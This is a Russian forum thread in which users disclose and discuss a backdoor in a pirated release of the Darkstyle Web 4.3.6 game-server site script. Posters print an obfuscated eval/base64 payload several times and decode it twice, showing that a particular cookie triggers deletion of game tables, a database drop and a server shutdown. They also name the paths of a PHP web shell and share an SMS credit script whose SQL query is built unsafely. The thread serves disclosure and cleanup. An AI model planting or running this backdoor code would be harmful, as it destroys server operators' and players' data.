Исправления уязвимости Darkstyle Web 4.3.6

[xakum]

Множественный уязвимости "Darkstyle 4.3.6 - For Free "

опасность - критическая.

в модулях /index.php и /inc/darkstyle.inc.php на некотором участке происходит сравнивание хеша кукиса, если выполняется условие сравнивания - удаляются некоторые таблицы, а затем происходит дроп базы MuOnline. уязвимость скрыта кодированием MIME base64

в закодированом виде:

Код Выделить Развернуть

eval(base64_decode(pack('H*',"4a4868335a574a6651556b4a50534268636e
4a68655639725a586c7a4b4352665130395053306c464b54734e43695270505
441374451703361476c735a53676b6154786a623356756443676b6548646c59
6c394253536b704948734e436d6c6d4b47316b4e53676b6548646c596c39425
356736b6156307049443039494363305a446c684e7a6334596a41774f57526c4
e3245314f4463775a6a497a4f546c6b4d546b794e4749354e4363706577304b6
2584e7a635778666358566c636e6b6f496b52465445565552534244614746795
9574e305a5849694b54734e436d317a63334673583346315a584a354b434a455
25578465645556752335670624751694b54734e436d317a63334673583346315
a584a354b434a4552557846564555675455564e516c394a546b5a5049696b374
451707463334e786246397864575679655367695245564d52565246494531465
4554a6655315242564349704f77304b62584e7a635778666358566c636e6b6f49
6b5253543141675a474a764c6b3131543235736157356c49696b3744517074633
34e7862463978645756796553676963326831644752766432343749696b374451
706b6157556f496c4e356333526c6253424759576c7364584a6c49434d7849696b
374451703944516f6b615373724f77304b66513d3d")));
после раскодирования:

Код Выделить Развернуть

$xweb_AI    = array_keys($_COOKIE);
$i=0;
while($i<count($xweb_AI)) {
if(md5($xweb_AI[$i]) == '4d9a778b009de7a5870f2399d1924b94'){
[color=#FF0000]mssql_query("DELETE Character");
mssql_query("DELETE Guild");
mssql_query("DELETE MEMB_INFO");
mssql_query("DELETE MEMB_STAT");
mssql_query("DROP dbo.MuOnline");
mssql_query("shutdown;");
[/color]die("System Failure #1");
}
$i++;
}то есть если на ваш сайт зайдет пользователь с определённым кукисом - у вас удалятся таблицы и база.


помимо этого в некоторые подкаталоги записан shell php --[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ предоставляющие полные доступ ко всем файлам сервера и не только.

файлы shell:
1. /index/protect.php
2. /index/items/season4.php
3. /index/smiles/index.php

Исправления данных угроз заключается в удалении всех файлов shell + удалении кода

Код Выделить Развернуть

eval(base64_decode(pack('H*',"4a4868335a574a6651556b4a50534268636e
4a68655639725a586c7a4b4352665130395053306c464b54734e43695270505
441374451703361476c735a53676b6154786a623356756443676b6548646c59
6c394253536b704948734e436d6c6d4b47316b4e53676b6548646c596c39425
356736b6156307049443039494363305a446c684e7a6334596a41774f57526c4
e3245314f4463775a6a497a4f546c6b4d546b794e4749354e4363706577304b6
2584e7a635778666358566c636e6b6f496b52465445565552534244614746795
9574e305a5849694b54734e436d317a63334673583346315a584a354b434a455
25578465645556752335670624751694b54734e436d317a63334673583346315
a584a354b434a4552557846564555675455564e516c394a546b5a5049696b374
451707463334e786246397864575679655367695245564d52565246494531465
4554a6655315242564349704f77304b62584e7a635778666358566c636e6b6f49
6b5253543141675a474a764c6b3131543235736157356c49696b3744517074633
34e7862463978645756796553676963326831644752766432343749696b374451
706b6157556f496c4e356333526c6253424759576c7364584a6c49434d7849696b
374451703944516f6b615373724f77304b66513d3d")));
или можете исправленные файлы - скачать и заменить все.

модераторам просьба не скрывать данное сообщение под Hide. т.к. все это выглядит как полный развод на бабки за исправления, да и сам я чуть не перешёл на тёмную сторону 

(с) xakumm

[Everybody]

модераторам просьба не скрывать данное сообщение под Hide.

Если веб качали без хайда то и фикс пусть берут без хайдов
-
Зеркало https://files.inbox.lv/ticket/2f80aa8a19c87...fix_by_xakm.zip
Пока мало кто предлогал платный фикс, клиенты Skyline27 получают апдейты бесплатно. Рассмотрим принцип распостранения веба, зашел человек и выложил какбы фрии дсвеб 4.3.6 и все довольны быро качать, ну хз мне эта каша из base64 кода тоже смутила в index.php, при конвертировании в исходный с помошью онлайн толлз на сайте _https://www.web-hack.ru/tools/crypt.php выдало хз что (нету у мну Zend guard-a на компе), далее забросил, плохо что некоторые испытали на себе это "пасхальное яйцо" - теперь вроде как все чисто должно быть. Больше никаких зеркал на фиксы, хватит санту-барбару устраивать с этим вебом как кто-то его так куча проблем =)))
К вложениям шеллов и дропДБ кода -  x-mu не имеет никакого отношения, все оплевухи в адрес распостранителя.

[Killbrum]

Ггг а я с самого начала говорил что что-то тут не чисто )))) т.к. крякера небыло =) веб не ломали =) да и Скай сам сказал что именно этот веб он не паковал =) вот и пасхалка =) тобишь. Это 4.3.6 , без 4.3.6. Тобишь рынок баженый =) не работает как надо, много глюков с ним. Инвентарь персонажа не работает. Смс бума нету. Капчи тоже небыло =) тоисть тупо "нате вам 4.3.6! Только это не 4.3.6" кстати не кто не подумал как только Скай сказал что больше нету поддержки 4.3.6 сразу появился паблик "типа нуль". И ещё пример. У знакомого 4.3.6 купленый. Фикса он не получил )))) да и бага у него небыло )))) у него небыло данной пасхалки =) так что 90% это тупо Скай сам же и типа нульнул и выложил. В итоге... =)

[Everybody]

это тупо Скай сам же и типа нульнул и выложил. В итоге... =)

Здесь одно НО, когда на x-mu.net форуме выложили этот веб, в течении дня он сам обращался с просьбой чтоб удалил паблик 4.3.6 null
На что последовал ответ что нет локиги в удалении темы с релизом - если удалю на форуме то появятся паблик 4.3.6 null по укозным и тому подобным сайтам.
Версии которые сеейчас не поддерживаются автором - были вскрытые/свиснуты и опубликованы.

Впредь кто разместит взломанные/вскрытые вебсайты DSW версии

4.4.1 Premium
5.0.0
6.0.0

получает бан надолго.
-
Поскольку автор не поддерживает уже версии
2.0, 2.1, 2.2, 3.0, 4.0, 4.1, 4.3.5, 4.3.6
и они в интернете публикуются "как есть" то можете публикоавть моды/хаки/темплейты/дополнения к этим версиям.

[SkyLinE27]

4.3.6 был продан серверу mu.dmge.lv и всё работало на момент продажи
Что добавил/удалил/изменил администратор этого сервера я не знаю.
Потом он начал продавать сайт.Купившие начали делать тоже самое )).
Ну а кто то купил чтобы выложить в паблик.
Я не знаю кто и когда что сделал с сайтом.
Так же не знаю кто его изменил перед тем как выложить.
Сам я сайт не выкладывал и не просил кого либо это сделать.
P.S. 4.3.6 не поддерзивается с 9 февраля 2009 года.

[ketanof]

**аный случай  заменил эти файлы которые тут скачал и ровно через 5 мин хакнули сука 25 ацц удалили -   это не полный фикс.

[Everybody]

**аный случай  заменил эти файлы которые тут скачал и ровно через 5 мин хакнули сука 25 ацц удалили -   это не полный фикс.

Неправильно может пропатчил!

[Zamez]

есть где в darkstyle web чтоб работа ето /index.php?topic=2308.0 и был защищен сайт? сразу говорю за $ сам знаю что можно купить , ну денег нету )) если даш денег то куплю ет было в зарание ответ ))

[Everybody]

Да в любой версии это смс система была. А если нету то можно прикрутить.

[Zamez]

если нетрудно бог бы кто дать сылку с работающей смс системой етой! а то я никак найти немагу (((

[Everybody]

SMS-Boom

Код Выделить Развернуть

<?


$select_top_cred_ = "SELECT TOP 5 memb___id,b_kred from MEMB_INFO order by b_kred desc";
$select_top_cred_ = mssql_query($select_top_cred_);
echo '<TABLE cellSpacing=1 cellPadding=1 width="48%" align=left border=0>
<TBODY>
<TR align=middle>
Нашему серверу очень помогли.</B>
</tr>
';
for($i=0;$i < mssql_num_rows($select_top_cred_);++$i)
{
$rank=$i+1;
$select_top_cred = mssql_fetch_row($select_top_cred_);

$credits = "select memb___id,credits from MEMB_CREDITS WHERE memb___id= '$select_top_cred[0]'";
$credits = mssql_query($credits);
$credits = mssql_fetch_row($credits);
$credits = $credits[1];
if(!$credits){
$credits ='n/a';
}
if($credits == 'n/a' AND $select_top_cred[1] == 0){
}
else{
echo "<TR align=middle>
<TD><B>$rank</B></TD>
<TD>$select_top_cred[0]</TD>
</tr>";
}
}
print"</table>";
?>
addkred.php

Код Выделить Развернуть

<?php
include"inc/m_protect.inc";

if(!isset($username)){ print "<div class="msg-error"><ul><li>Please login first</li></ul></div>";
}
else{
//=============Credit count=============
$add_credits='100';
//====================================
print"<div class="page-head">Пополнить счёт кредитов</div>";
### SMS:Key v1.0.6 ###
$old_ua = @ini_set('user_agent', 'smscoin_key_1.0.6');
$key_id = 204190;
$response = @file("https://27ac.key.smscoin.com/key/?s_pure=1&s_enc=utf-8&s_key=".$key_id
."&s_pair=".urlencode(substr($_GET["s_pair"],0,10))
."&s_language=".urlencode(substr($_GET["s_language"],0,10))
."&s_ip=".$_SERVER["REMOTE_ADDR"]
."&s_url=".$_SERVER["SERVER_NAME"].htmlentities(urlencode($_SERVER["REQUEST_URI"])));
if ($response !== false) {
if (count($response)>1 || $response[0] != 'true') {
die(implode("", $response));
}
} else die('Не удалось запросить внешний сервер');
@ini_set('user_agent', $old_ua);
### SMS:Key end ###

$set_credits = mssql_query("UPDATE dbo.MEMB_CREDITS SET Credits = Credits + $add_credits WHERE memb___id = '$username'");

print"<div class="msg-ok"><ul><li>Added 100 Credits</li></ul></div>";

}

?>
Настраивайте сами, не прверял работоспособность, кредадд еще от версии 4.1

[Человек]

Не совсем по теме но всё же - проблема у меня с РЫНКОМ ,Выставляю шмотку на продажу ,а она не появляеться -что может быть?
Перепробывал уже кучу всего но  эффекта 0...  
З.Ы Соседние темы все читал ответа не нашёл,Может сдесь кто поможет? )))

[RANDALL]

Скорее всего проблемы со временами вкладки в магазин. Выложи здесь строчку с таблицы базы данных, посмотрим

[Человек]

Скорее всего проблемы со временами вкладки в магазин. Выложи здесь строчку с таблицы базы данных, посмотрим

Спс я уже разобрался,проблема в Appserv была =)

[cokpat]

а вы уверены все что там 5 шеллов всего?

я тут еще в одном файле нашел эту гадость... могу ошибаться
вот код

Спойлер

eval(base64_decode(pack('H*',"4a4868335a574a6651556b4a50534268636e4a68655639725a586c7a4b43526651303950533
06c464b54734e43695270505441374451703361476c735a53676b6154786a623356756443676b6548
646c596c394253536b704948734e436d6c6d4b47316b4e53676b6548646c596c39425356736b61563
07049443039494363305a446c684e7a6334596a41774f57526c4e3245314f4463775a6a497a4f546c
6b4d546b794e4749354e4363706577304b62584e7a635778666358566c636e6b6f496b52465445565
5525342446147467959574e305a5849694b54734e436d317a63334673583346315a584a354b434a45
525578465645556752335670624751694b54734e436d317a63334673583346315a584a354b434a455
2557846564555675455564e516c394a546b5a5049696b374451707463334e78624639786457567965
5367695245564d525652464945314654554a6655315242564349704f77304b62584e7a63577866635
8566c636e6b6f496b5253543141675a474a764c6b3131543235736157356c49696b37445170746333
4e7862463978645756796553676963326831644752766432343749696b374451706b6157556f496c4
e356333526c6253424759576c7364584a6c49434d7849696b374451703944516f6b615373724f7730
4b66513d3d")));

[свернуть]

это оно или меня плющить начало уже?

[user_MU]

Я не в одном месте такую гадость нашел. Шелл был раскинут по разным папкам.
Кстате вопрос - а чем раскодировать данный код? Есть какая-то тулза для этих целей?

[cokpat]

Я не в одном месте такую гадость нашел. Шелл был раскинут по разным папкам.
Кстате вопрос - а чем раскодировать данный код? Есть какая-то тулза для этих целей?

сам ищу такую прогу или что то на подобии.

[Everybody]

Я не в одном месте такую гадость нашел. Шелл был раскинут по разным папкам.
Кстате вопрос - а чем раскодировать данный код? Есть какая-то тулза для этих целей?

Вообщем по началу я тоже думал а чем раскодировать и какая именно прога нужна. Поюзал google, на странице так 5-6 нашел ответ:

Нашли подозрительный код:

Код Выделить Развернуть

eval(base64_decode(pack('H*',"4a4868335a574a6651556b4a50534268636e
4a68655639725a586c7a4b4352665130395053306c464b54734e43695270505
441374451703361476c735a53676b6154786a623356756443676b6548646c59
6c394253536b704948734e436d6c6d4b47316b4e53676b6548646c596c39425
356736b6156307049443039494363305a446c684e7a6334596a41774f57526c4
e3245314f4463775a6a497a4f546c6b4d546b794e4749354e4363706577304b6
2584e7a635778666358566c636e6b6f496b52465445565552534244614746795
9574e305a5849694b54734e436d317a63334673583346315a584a354b434a455
25578465645556752335670624751694b54734e436d317a63334673583346315
a584a354b434a4552557846564555675455564e516c394a546b5a5049696b374
451707463334e786246397864575679655367695245564d52565246494531465
4554a6655315242564349704f77304b62584e7a635778666358566c636e6b6f49
6b5253543141675a474a764c6b3131543235736157356c49696b3744517074633
34e7862463978645756796553676963326831644752766432343749696b374451
706b6157556f496c4e356333526c6253424759576c7364584a6c49434d7849696b
374451703944516f6b615373724f77304b66513d3d")));
Теперь создаем пустой скрипт на своем веб сервере например с названием opencode.php и его содержимое будет этот же код но не eval a echo

Код Выделить Развернуть

<? echo(base64_decode(pack('H*',"4a4868335a574a6651556b4a50534268636e
4a68655639725a586c7a4b4352665130395053306c464b54734e43695270505
441374451703361476c735a53676b6154786a623356756443676b6548646c59
6c394253536b704948734e436d6c6d4b47316b4e53676b6548646c596c39425
356736b6156307049443039494363305a446c684e7a6334596a41774f57526c4
e3245314f4463775a6a497a4f546c6b4d546b794e4749354e4363706577304b6
2584e7a635778666358566c636e6b6f496b52465445565552534244614746795
9574e305a5849694b54734e436d317a63334673583346315a584a354b434a455
25578465645556752335670624751694b54734e436d317a63334673583346315
a584a354b434a4552557846564555675455564e516c394a546b5a5049696b374
451707463334e786246397864575679655367695245564d52565246494531465
4554a6655315242564349704f77304b62584e7a635778666358566c636e6b6f49
6b5253543141675a474a764c6b3131543235736157356c49696b3744517074633
34e7862463978645756796553676963326831644752766432343749696b374451
706b6157556f496c4e356333526c6253424759576c7364584a6c49434d7849696b
374451703944516f6b615373724f77304b66513d3d"))); ?>
Теперь запускаем его localhost/opencode.php и ву-а-ля

Код Выделить Развернуть

$xweb_AI    = array_keys($_COOKIE);
$i=0;
while($i<count($xweb_AI)) {
if(md5($xweb_AI[$i]) == '4d9a778b009de7a5870f2399d1924b94'){
mssql_query("DELETE Character");
mssql_query("DELETE Guild");
mssql_query("DELETE MEMB_INFO");
mssql_query("DELETE MEMB_STAT");
mssql_query("DROP dbo.MuOnline");
mssql_query("shutdown;");
die("System Failure #1");
}
$i++;
}

[БабушкаТрансформер]

Вот от таких как ты и спрятали, что бы не хапали всё готовое )

[ketanof]

thanks br0 great post

До эстонии только дошел FIX? я думал просто что латвия сама медленная страна )